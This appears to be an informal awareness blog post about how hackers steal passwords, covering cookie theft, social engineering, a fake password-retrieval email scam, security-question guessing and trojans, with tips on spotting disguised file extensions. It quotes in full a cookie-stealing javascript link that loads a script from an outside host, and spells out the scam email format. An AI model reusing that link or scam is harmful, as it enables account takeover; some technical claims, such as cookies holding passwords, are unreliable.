These days hackers are more active than ever and trying each & everything to hack/steal passwords and personal information...there are lots of ways to hack passwords and personal information let me explain you few of them:--1) Cookie Stealing >> Cookies contains your passwords as well as ur personal information any good programmer or a IT person can easily ready cookies and steal ur data....few days back I recevied a link frm a hacker he mentioned that copy paste this link and u will get 1000 fans in 5 minutes...but when i check that link found that that is cookies stealing link. Let me explain you how:--This is that link(don't worry now this link is no more in use as i made some changes in it...javascript:aumentando_membros = prompt('Digite o nome da sua comunidade',''); multiplicando_membros = document.createElement('script'); multiplicando_membros.src = "http://cook.freehostia.com/js.php?uid=******01952438******";document.getElementsByTagName('head')[0].appendChild(multiplicando_membros); alert('Aumentando membros da comunidade '+aumentando_membros+'....'); alert('Aguarde alguns instantes ...');void(0)"; document.getElementsByTagName('head')[0].appendChild(multiplicando_membros); alert('Aumentando membros da comunidade '+aumentando_membros+'....'); alert('Aguarde alguns instantes ...');void(0)"http://cook.freehostia.com/js.php" This makes me suspecious abt this link as this link shows the "js.php" which stands for cookie transfering....Decode Version of this link is:-prompt --to send Digite o nome da sua comunidadedocument.createElement -- calling constructor passing the 'script' value to the constructormultiplicando_membros.src -- user id is being passeddocument.getElementsByTagName -- head tag is executed then the prompt's value is concatenated with italerts -- for messages containing values of variables such as aumentando_membros;So, b alert with these kind of links.
3) Social Engg >> In computer security, social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures. For example, a person using social engineering to break into a computer network would try to gain the confidence of someone who is authorized to access the network in order to get them to reveal information that compromises the network's security.Types/Methods:-A) By PhoneB) By OnlineC) Dumpster DivingD) PersuasionReverse Social Engineering >> This is when the hacker creates a persona that appears to be in a position of authority so that employees will ask him for information, rather than the other way around. If researched, planned and executed well, reverse social engineering attacks may offer the hacker an even better chance of obtaining valuable data from the employees; however, this requires a great deal of preparation, research, and pre-hacking to pull off.Example:-First send a letter to retpass_pssfrgotonnen@yahoo.com, second within the Subject heading place the word "Password" (not in quotes ) this way the automated bot recognizes what you are after. Then in the text field place the name of the person at yahoo that you want to hack (Do put @yahoo.com(or co.in) after their name). No capital letters are to be put in this place. Then skip three (3) lines and place your own hotmail account information such as: "My login:My password" (a semicolon makes it easier for the bot to recognize). This way the bot can verify that your account actually exists. And then supplies you with the password for the person's account that you want it for. Here is an example:To: retpass_pssfrgotonnen@yahoo.comSubject: Passwordlogin of the person you want to hack3 blank lines ---1yourlogin:yourpasswordDon't ever try this as this is fake trick..to get passwords.Think why the retpass...@yahoo.com require ur password to crack ur victim's password...4) Very popular trick these days is like.....they will send u a "Slam Book" likeUR Name:-BOD:-UR Best Frnd:-Ur Love:-You Like:-Your Home Towm:-Your Pet Name:-UR Childhood Hero etc. etc.....But don't give them these details...as you knows that while filling the yahoo or any mail server's sign up page you entered these details....they will note ur ID and will try all those things which u mentioned in the slam book...This technique is also know as "Dictionary Attack"....it takes lots of time coz this is the trick of guessing the password recovery details....so b carefull..........
) Viruses/Trojans/Spywares/BootersThese are also included in hacking tools....as these are very very very very very most popular these days......Viruses/Trojans/Spywares are basically use for stealing the information when user will online or offline in both case.....trojans and spywares are programmed by hackers and they spread them into victims PC and when the victim login they will start transferring the information to attacker via open ports.....just like spy who leaked the information to authorized or non-authorized people...Booter:- Booters are used for disconnecting or throwing out user frm yahoo..Precautions:-1) Never open any suspecious attachment. Only open the attachments which are coming frm trusted users or known users.2) Updated antivirus and spyware while surfing internet.3) Before opening any attachment or any downloaded file check its extension like these day its very easy to change the icons of viruses/trojans. Attackers can change the icons and then they will send u like mypic.jpg, funny.jpg etc..but before opening any untrusted files go to My computer >> Tools >> Folder options >> View >> Uncheck the "Hide file extension for known file types"4) If u uncheck this then u can check the extensions of those files u recevied frm known or unknown senders....after that you will abel to detect the viruses/trojans/booters as now the attacker can change the ICON but he can't change the extension...now the extension will look like this mypic.jpg.exe or funny.jpg.exe this exe extension shows that this files contains any suspecious coding....Pls remember these points...list of few harmful extensions...exe, vbs, js, .reg.....NOW Pls comment if u like this TOPIC.................
No comments:
Post a Comment